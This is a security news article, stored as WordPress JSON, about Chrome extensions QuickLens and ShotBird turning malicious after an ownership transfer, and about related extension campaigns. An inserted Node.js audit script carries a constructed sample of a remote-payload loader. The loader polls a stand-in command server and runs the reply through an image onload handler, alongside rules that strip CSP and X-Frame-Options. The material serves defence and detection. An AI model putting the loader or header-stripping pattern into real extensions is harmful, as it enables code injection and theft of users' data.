{"id":196,"date":"2026-03-09T10:56:01","date_gmt":"2026-03-09T10:56:01","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=196"},"modified":"2026-03-09T10:56:01","modified_gmt":"2026-03-09T10:56:01","slug":"chrome-extension-turns-malicious-after-ownership-transfer-enabling-code-injection-and-data-theft","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=196","title":{"rendered":"Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft"},"content":{"rendered":"<div id=\"articlebody\">\n<p>Two Google Chrome extensions have turned malicious after what appears to be a case of <a href=\"https:\/\/x.com\/tuckner\/status\/2027416172442853830\" rel=\"noopener\" target=\"_blank\">ownership transfer<\/a>, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data.<\/p>\n<p>The extensions in question, both originally associated with a developer named \u00abakshayanuonline@gmail.com\u00bb (BuildMelon), are listed below &#8211;<\/p>\n<ul>\n<li>QuickLens &#8211; Search Screen with Google Lens (ID: kdenlnncndfnhkognokgfpabgkgehodd) &#8211; 7,000 users<\/li>\n<li>ShotBird &#8211; Scrolling Screenshots, Tweet Images &amp; Editor (ID: gengfhhkjekmlejbhmmopegofnoifnjp) &#8211; 800 users<\/li>\n<\/ul>\n<p>While QuickLens is no longer available for download from the Chrome Web Store, ShotBird remains accessible as of writing. 
ShotBird was <a href=\"https:\/\/www.reddit.com\/r\/chrome_extensions\/comments\/1gkv28r\/free_say_hello_to_shotbird_make_better\/\" rel=\"noopener\" target=\"_blank\">originally launched<\/a> in November 2024, with its developer, Akshay Anu S (@AkshayAnuOnline), <a href=\"https:\/\/x.com\/AkshayAnuOnline\/status\/1854777234541642035\" rel=\"noopener\" target=\"_blank\">claiming<\/a> on X that the extension is suitable for \u00abcreating professional, studio-like visuals,\u00bb and that all processing happens locally.<\/p>\n<p>According to <a href=\"https:\/\/monxresearch-sec.github.io\/shotbird-extension-malware-report\/\" rel=\"noopener\" target=\"_blank\">research<\/a> published by monxresearch-sec, the browser add-on received a \u00abFeatured\u00bb flag in January 2025, before it was passed on to a different developer (\u00abloraprice198865@gmail.com\u00bb) sometime last month.<\/p>\n<p>In a similar vein, QuickLens was listed for sale on ExtensionHub on October 11, 2025, by \u00abakshayanuonline@gmail.com\u00bb merely two days after it was published, Annex Security&#8217;s John Tuckner <a href=\"https:\/\/annex.security\/blog\/pixel-perfect\/\" rel=\"noopener\" target=\"_blank\">said<\/a>. 
On February 1, 2026, the extension&#8217;s owner changed to \u00absupport@doodlebuggle.top\u00bb on the Chrome Web Store listing page.<\/p>\n<p>The malicious update pushed to QuickLens on February 17, 2026, kept the original functionality but added the ability to strip security headers (X-Frame-Options among them) from every HTTP response, so that scripts the extension injects into a web page can run and make arbitrary requests to other domains that the page&#8217;s Content Security Policy (<a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Guides\/CSP\" rel=\"noopener\" target=\"_blank\">CSP<\/a>) would otherwise block.<\/p>\n<p>In addition, the extension contained code to fingerprint the user&#8217;s country, detect the browser and operating system, and poll an external server every five minutes for JavaScript. The received code is stored in the browser&#8217;s local storage and executed on every page load: the extension adds a hidden 1\u00d71 GIF &lt;img&gt; element to the page and sets the JavaScript string as its \u00abonload\u00bb attribute. An \u00abonload\u00bb attribute is an inline event handler, which a page CSP without \u00abunsafe-inline\u00bb refuses to execute, so the header stripping is what lets the trick work on sites that ship a strict policy. 
This, in turn, causes the malicious code to be executed once the image is loaded.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgtbNVFQArInH_tIqk1dHv8QtD4RMtEkzUjgiEzaxf4z0lmK6RcYoKLyd9KlMLtR3pXGvE4vJEaO046ysdQwH7zP0-1R9WqRMYBEsTgTbDk6tINfKUZ4R9W7Klf38B5DvTduvDARTerx7w9IEZ8PCu0ytRoPVr9nu6Vxzngv2PrndHNlMz5f6C28dfZCaya\/s1700-e365\/short.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgtbNVFQArInH_tIqk1dHv8QtD4RMtEkzUjgiEzaxf4z0lmK6RcYoKLyd9KlMLtR3pXGvE4vJEaO046ysdQwH7zP0-1R9WqRMYBEsTgTbDk6tINfKUZ4R9W7Klf38B5DvTduvDARTerx7w9IEZ8PCu0ytRoPVr9nu6Vxzngv2PrndHNlMz5f6C28dfZCaya\/s1700-e365\/short.png\" alt=\"\" border=\"0\" data-original-height=\"717\" data-original-width=\"1453\"\/><\/a><\/div>\n<p>\u00abThe actual malicious code never appears in the extension&#8217;s source files,\u00bb Tuckner explained. \u00abStatic analysis shows a function that creates image elements. That&#8217;s it. The payloads are delivered from the C2 and stored in local storage &#8212; they only exist at runtime.\u00bb<\/p>\n<p>A similar analysis of the ShotBird extension by monxresearch-sec has uncovered the use of direct callbacks to deliver JavaScript code instead of creating a 1&#215;1 pixel image to trigger the execution. 
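<\/p>
<p>The following is an added example, not code from QuickLens, ShotBird, Annex Security or monxresearch-sec: a small Node.js audit script that shows how a reviewer would look for the capabilities described above inside an extension package. It flags a declarativeNetRequest rule that removes security headers such as X-Frame-Options or Content-Security-Policy, the runtime-payload loader pattern (periodic fetch, payload kept in extension storage, executed through an inline \u00abonload\u00bb handler or eval), and the chrome_settings_overrides home page and default-search hijack that Unit 42 describes for OmniBar later in this article. The manifest, rule set and source snippets are constructed for the example, every name and host is hypothetical, and the matching is heuristic: the article does not say whether QuickLens used declarativeNetRequest or a webRequest listener to strip headers, so the script looks for both.<\/p>
```javascript
// Added audit example (not code from QuickLens, ShotBird, OmniBar or the
// researchers who analysed them). Manifest, rules and source snippets below
// are constructed; all names and hosts are hypothetical.

// Response headers whose removal or rewrite weakens the page's own defences.
const SECURITY_HEADERS = new Set([
  'content-security-policy', 'content-security-policy-report-only', 'x-frame-options',
  'strict-transport-security', 'x-content-type-options', 'cross-origin-opener-policy',
  'cross-origin-embedder-policy', 'cross-origin-resource-policy', 'referrer-policy',
]);

// declarativeNetRequest rules of type modifyHeaders that remove (or overwrite)
// a security header. The other standard mechanism, a webRequest
// onHeadersReceived listener, is caught by the source patterns further down.
function findHeaderStrippingRules(rules) {
  const out = [];
  for (const rule of rules) {
    if (!rule.action || rule.action.type !== 'modifyHeaders') continue;
    for (const h of rule.action.responseHeaders || []) {
      const name = String(h.header).toLowerCase();
      if (!SECURITY_HEADERS.has(name)) continue;
      if (h.operation !== 'remove' && h.operation !== 'set') continue;
      out.push({ ruleId: rule.id, header: name, operation: h.operation,
                 urlFilter: (rule.condition || {}).urlFilter || '(all URLs)' });
    }
  }
  return out;
}

// Heuristic source patterns (plain string matching, not AST analysis; an
// obfuscated or minified extension needs dynamic analysis instead).
const LOADER_PATTERNS = [
  ['polling',         /(setInterval|chrome[.]alarms[.]create)[ ]*[(]/],
  ['remote_fetch',    /(fetch|XMLHttpRequest)[ ]*[(]/],
  ['stores_payload',  /(localStorage|chrome[.]storage[.](local|session|sync))[.]set/],
  ['inline_handler',  /setAttribute[ ]*[(][ ]*.on(load|error)./],
  ['dynamic_eval',    /(new Function|eval)[ ]*[(]/],
  ['header_listener', /onHeadersReceived[.]addListener/],
];

function findRemotePayloadPatterns(src) {
  return LOADER_PATTERNS.filter(([, re]) => re.test(src)).map(([name]) => name);
}

// chrome_settings_overrides can replace the home page and default search engine;
// every search_url query parameter other than the {searchTerms} placeholder is
// reported as a tracking or affiliate marker.
function findSettingsOverrides(manifest) {
  const findings = [];
  const o = manifest.chrome_settings_overrides;
  if (!o) return findings;
  if (o.homepage) findings.push({ kind: 'homepage_override', detail: o.homepage });
  const sp = o.search_provider;
  if (sp && sp.search_url) {
    const url = new URL(sp.search_url.replace('{searchTerms}', 'SEARCHTERMS'));
    const trackingParams = [...url.searchParams]
      .filter(([, v]) => v !== 'SEARCHTERMS').map(([k]) => k);
    findings.push({ kind: sp.is_default ? 'default_search_override' : 'search_provider',
                    detail: url.host, trackingParams });
  }
  return findings;
}

function auditExtension({ manifest, rules = [], sources = [] }) {
  const findings = [];
  const hosts = manifest.host_permissions || [];
  if (hosts.some(h => h === '<all_urls>' || h.startsWith('*://*/'))) {
    findings.push({ kind: 'broad_host_access', detail: hosts.join(',') });
  }
  for (const f of findHeaderStrippingRules(rules)) {
    findings.push({ kind: 'strips_security_header', ...f });
  }
  const seen = new Set(sources.flatMap(findRemotePayloadPatterns));
  if (seen.has('header_listener')) {
    findings.push({ kind: 'header_listener', detail: 'webRequest.onHeadersReceived' });
  }
  const executes = seen.has('inline_handler') || seen.has('dynamic_eval');
  if (seen.has('remote_fetch') && seen.has('stores_payload') && executes) {
    findings.push({ kind: 'remote_code_loader', detail: [...seen].sort().join(',') });
  }
  findings.push(...findSettingsOverrides(manifest));
  return findings;
}

// Constructed sample package mirroring the behaviours described in the article.
const SAMPLE_MANIFEST = {
  manifest_version: 3, name: 'Hypothetical Lens Tool',
  permissions: ['declarativeNetRequest', 'storage'], host_permissions: ['<all_urls>'],
  declarative_net_request: { rule_resources: [{ id: 'rs1', enabled: true, path: 'rules.json' }] },
  chrome_settings_overrides: {
    homepage: 'https://home.example.invalid',
    search_provider: { name: 'Example Search', keyword: 'ex', encoding: 'UTF-8', is_default: true,
      search_url: 'https://go.example.invalid/?api=omni&sub1=aff&q={searchTerms}' },
  },
};
const SAMPLE_RULES = [
  { id: 1, priority: 1, action: { type: 'modifyHeaders', responseHeaders: [
      { header: 'X-Frame-Options', operation: 'remove' },
      { header: 'Content-Security-Policy', operation: 'remove' } ] },
    condition: { urlFilter: '*', resourceTypes: ['main_frame', 'sub_frame'] } },
  { id: 2, priority: 1, action: { type: 'block' },
    condition: { urlFilter: '||ads.example.invalid', resourceTypes: ['script'] } },
];
// Service worker polls a server and keeps the reply; the content script then
// runs the stored string as an inline event handler on a hidden image.
const SAMPLE_BACKGROUND_JS = `setInterval(async () => {
  const r = await fetch('https://c2.example.invalid/js?cc=' + navigator.language);
  chrome.storage.local.set({ p: await r.text() });
}, 5 * 60 * 1000);`;
const SAMPLE_CONTENT_JS = `chrome.storage.local.get('p', ({ p }) => {
  const img = document.createElement('img');
  img.src = chrome.runtime.getURL('pixel.gif');
  img.setAttribute('onload', p);
  document.body.appendChild(img);
});`;

function runSampleAudit() {
  return auditExtension({ manifest: SAMPLE_MANIFEST, rules: SAMPLE_RULES,
                          sources: [SAMPLE_BACKGROUND_JS, SAMPLE_CONTENT_JS] });
}

for (const f of runSampleAudit()) console.log(f.kind, JSON.stringify(f));
```
<p>Run with node; on the constructed package the audit reports broad host access, two stripped security headers, the remote code loader, the home page override and a default search override whose tracking parameters are \u00abapi\u00bb and \u00absub1\u00bb. An empty result proves nothing for a minified or remotely fed extension, which is the point Tuckner makes: the payload never ships in the package, so static review can only catch the loader pattern, not the code it loads.<\/p>
<p>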
ShotBird&#8217;s JavaScript displays a bogus Google Chrome browser update prompt; clicking it serves users a ClickFix-style page that instructs them to open the Windows Run dialog, launch \u00abcmd.exe\u00bb, and paste a PowerShell command, which downloads an executable named \u00abgoogleupdate.exe\u00bb on Windows hosts.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEghw5aOSEwX7E3oTaco23HX_tRAaOQWXAv5il2MoG38psjlOR7Nct0E4393oLqMRE9snrm60Cl1laVyqL9MTgnH3R1sBPaq1CQuLW4yPoOALBlZ2NVLFZC3UF9HNUsuylPVxzf2QBeM00bRKoHSaNs0zVXbhibhq68M3zfgaGamUcTuIuQv66gfyVEA7i8z\/s1700-e365\/supply.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEghw5aOSEwX7E3oTaco23HX_tRAaOQWXAv5il2MoG38psjlOR7Nct0E4393oLqMRE9snrm60Cl1laVyqL9MTgnH3R1sBPaq1CQuLW4yPoOALBlZ2NVLFZC3UF9HNUsuylPVxzf2QBeM00bRKoHSaNs0zVXbhibhq68M3zfgaGamUcTuIuQv66gfyVEA7i8z\/s1700-e365\/supply.png\" alt=\"\" border=\"0\" data-original-height=\"1952\" data-original-width=\"2202\"\/><\/a><\/div>\n<p>The malware then hooks input, textarea, and select HTML elements to capture whatever the victim enters, which could include credentials, PINs, card details, tokens, and government identifiers. It&#8217;s also equipped to siphon data stored in the Chrome web browser, such as passwords, browsing history, and extension-related information.<\/p>\n<p>\u00abThis is a two-stage abuse chain: extension-side remote browser control plus host-level execution pivot via fake updates,\u00bb the researcher said. \u00abThe result is high-risk data exposure in-browser and confirmed host-side script execution on at least one affected system. 
In practical terms, this elevates the impact from browser-only abuse to likely credential theft and broader endpoint compromise.\u00bb<\/p>\n<p>It&#8217;s assessed that the same threat actor is behind the compromise of the two extensions and is operating such add-ons in parallel, given the use of an identical command-and-control (C2) architecture pattern, ClickFix lures injected into the browsing context, and ownership transfer as an infection vector.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiPooBnA_BkLKvWR7VnMPD1tAnk4ionaZ-EEKjpOlhyphenhyphenU9htgxvrnhocDSplm6DYEjgCRD6ouBSDJr_0kn61JnHfrCBaZRD3-fwDqcHgLwpaXsJdTAdAhJhjjrYXVRGrwdib54XE-G_H-kVVzY5QNE1vRrRXNFXo1kU5zGJh7ml7AVYfPWBsAlH-x06nk5dc\/s1700-e365\/chrome-malware.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiPooBnA_BkLKvWR7VnMPD1tAnk4ionaZ-EEKjpOlhyphenhyphenU9htgxvrnhocDSplm6DYEjgCRD6ouBSDJr_0kn61JnHfrCBaZRD3-fwDqcHgLwpaXsJdTAdAhJhjjrYXVRGrwdib54XE-G_H-kVVzY5QNE1vRrRXNFXo1kU5zGJh7ml7AVYfPWBsAlH-x06nk5dc\/s1700-e365\/chrome-malware.png\" alt=\"\" border=\"0\" data-original-height=\"1536\" data-original-width=\"2716\"\/><\/a><\/div>\n<p>Interestingly, the original extension developer has <a href=\"https:\/\/chromewebstore.google.com\/detail\/radial-new-tab\/fogdlfdfpjlpmpmnmeepffaikefkacnc\" rel=\"noopener\" target=\"_blank\">published<\/a> <a href=\"https:\/\/chromewebstore.google.com\/detail\/reditop-%E2%80%93-scroll-to-top-f\/gddonialdhbldcdbnbloangmjnpcnhhd\" rel=\"noopener\" target=\"_blank\">several<\/a> <a href=\"https:\/\/chromewebstore.google.com\/detail\/audiomatch-youtube-audio\/mejaghdgnidejbeofmfhnogbniipdjge\" rel=\"noopener\" target=\"_blank\">other<\/a> <a href=\"https:\/\/chromewebstore.google.com\/detail\/sidewiki-%E2%80%93-sidebar-for-wi\/ofifhmaojnmphodmgkipjpjedgnhkbhl\" 
rel=\"noopener\" target=\"_blank\">extensions<\/a> under their name on the Chrome Web Store, and all of them have received a Featured badge. The developer also has an <a href=\"https:\/\/www.extensionhub.io\/akshayanu\" rel=\"noopener\" target=\"_blank\">account on ExtensionHub<\/a>, although no extensions are currently listed for sale. What&#8217;s more, the individual has <a href=\"https:\/\/www.reddit.com\/r\/DomainsForSale\/comments\/1r710f3\/aiinfrastackcom_domain_for_sale_2500\/\" rel=\"noopener\" target=\"_blank\">attempted<\/a> to sell domains like \u00abAIInfraStack[.]com\u00bb for $2,500, stating the \u00abstrong keyword domain\u00bb is \u00abrelevant for [sic] rapidly growing AI ecosystem.\u00bb<\/p>\n<p>\u00abThis is the extension supply chain problem in a nutshell,\u00bb Annex Security said. \u00abA &#8216;Featured,&#8217; reviewed, functional extension changes hands, and the new owner pushes a weaponized update to every existing user.\u00bb<\/p>\n<p>The disclosure comes as Microsoft warned of the malicious Chromium\u2011based browser extensions that masquerade as legitimate AI assistant tools to harvest LLM chat histories and browsing data.<\/p>\n<p>\u00abAt scale, this activity turns a seemingly trusted productivity extension into a persistent data collection mechanism embedded in everyday enterprise browser usage, highlighting the growing risk browser extensions pose in corporate environments,\u00bb the Microsoft Defender Security Research Team <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/05\/malicious-ai-assistant-extensions-harvest-llm-chat-histories\/\" rel=\"noopener\" target=\"_blank\">said<\/a>.<\/p>\n<p>In recent weeks, threat hunters have also flagged a malicious Chrome extension named lm\u03a4oken Chromophore (ID: bbhaganppipihlhjgaaeeeefbaoihcgi) that impersonates imToken while advertising itself as a hex color visualizer in the Chrome Web Store to steal cryptocurrency seed phrases using phishing 
redirects.<\/p>\n<p>\u00abInstead of providing the harmless tool it promises, the extension automatically opens a threat actor-controlled phishing site as soon as it is installed, and again whenever the user clicks it,\u00bb Socket researcher Kirill Boychenko <a href=\"https:\/\/socket.dev\/blog\/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects\" rel=\"noopener\" target=\"_blank\">said<\/a>.<\/p>\n<p>\u00abOn install, the extension fetches a destination URL from a hardcoded JSONKeeper endpoint (jsonkeeper[.]com\/b\/KUWNE) and opens a tab pointing to a lookalike Chrome Web Store-style domain, chroomewedbstorre-detail-extension[.]com. The landing page impersonates imToken using mixed-script homoglyphs and funnels victims into credential-capture flows that request either a 12 or 24-word seed phrase or a private key.\u00bb<\/p>\n<p>Other malicious extensions <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-02-20-%20AI-Accelerated%20Malicious%20Chrome%20Extension%20Campaigns.txt\" rel=\"noopener\" target=\"_blank\">flagged<\/a> by Palo Alto Networks Unit 42 have been found to engage in affiliate hijacking and data exfiltration, with one of them \u2013 Chrome MCP Server &#8211; AI Browser Control (ID: fpeabamapgecnidibdmjoepaiehokgda) \u2013 <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-02-11-IOCs-for-RAT-disguinsed-as-AI-based-browser-extension.txt\" rel=\"noopener\" target=\"_blank\">serving<\/a> as a full-fledged remote access trojan while masquerading as an AI automation tool using the Model Context Protocol (MCP).<\/p>\n<p>Unit 42 researchers have also revealed that three popular Chrome extensions, namely Urban VPN Proxy, Urban Browser Guard, and Urban Ad Blocker, which Koi had identified as scraping AI conversations from chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta 
AI, and Perplexity, have returned on the Chrome Web Store.<\/p>\n<p>\u00abFollowing the public disclosure of the campaign on December 15, 2025, the developer updated benign versions in January 2026, likely in response to the report,\u00bb researchers Qinge Xie, Nabeel Mohamed, Shresta Bellary Seetharam, Fang Liu, Billy Melicher, and Alex Starov <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-02-13-IOCs-for-tactics-by-browser-extensions-to-avoid-bans.txt\" rel=\"noopener\" target=\"_blank\">said<\/a>.<\/p>\n<p>Furthermore, the cybersecurity company identified an extension called Palette Creator (ID: iofmialeiddolmdlkbheakaefefkjokp), which has over 100,000 users and whose previous version communicated with known network indicators associated with a campaign dubbed RedDirection to carry out browser hijacking.<\/p>\n<p>That&#8217;s not all. A new campaign <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-03-09-Threat-Alert-30K-domains-distributing-malicious-AI-related-browser-extension.txt\" rel=\"noopener\" target=\"_blank\">comprising<\/a> over 30,000 domains has been found to initiate a redirect chain that routes traffic to a landing page (\u00abansiblealgorithm[.]com\u00bb) used to distribute a Chrome extension called OmniBar AI Chat and Search (ID: ajfanjhcdgaohcbphpaceglgpgaaohod).<\/p>\n<p>The extension uses the chrome_settings_overrides manifest key to set the browser home page to omnibar[.]ai and to make a custom URL the default search provider: \u00abgo.omnibar[.]ai\/?api=omni&amp;sub1=omnibar.ai&amp;q={searchTerms}\u00bb, which lets it track every query via the API parameter in that URL.<\/p>\n<p>It&#8217;s believed that the end goal is to perform browser hijacking as part of what seems to be a large-scale affiliate marketing scheme, Unit 42 said, adding that it identified two other extensions that exhibit the same browser-hijacking behavior as OmniBar via home page override and search interception &#8211;<\/p>\n<ul>\n<li>AI Output Algo Tool (ID: eeoonfhmbjlmienmmbgapfloddpmoalh)<\/li>\n<li>Serpey.com official extension (ID: hokdpdlchkgcenfpiibjjfkfmleoknkp)<\/li>\n<\/ul>\n<p>A deeper investigation of three more extensions published by the same developer (\u00abjon@status77.com\u00bb and Status 77) has uncovered that two of them track user browsing activity to inject affiliate markers, while the third extracts and transmits users&#8217; Reddit comment threads to a developer-controlled API endpoint &#8211;<\/p>\n<ul>\n<li>Care.Sale (ID: jaioobipjdejpeckgojiojjahmkiaihp)<\/li>\n<li>Giant Coupons Official Extension (ID: akdajpomgjgldidenledjjiemgkjcchc)<\/li>\n<li>Consensus &#8211; Reddit Comment Summarizer (ID: mkkfklcadlnkhgapjeejemflhamcdjld)<\/li>\n<\/ul>\n<p>Users who have installed any of the aforementioned extensions are advised to remove them from their browsers immediately, avoid side-loading or installing unverified productivity extensions, and audit their browsers for unknown extensions and uninstall them.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary 
code,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":197,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[182,10,38,524,520,525,33,522,526,523,521],"class_list":["post-196","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-chrome","tag-code","tag-data","tag-enabling","tag-extension","tag-injection","tag-malicious","tag-ownership","tag-theft","tag-transfer","tag-turns"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=196"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/196\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/197"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}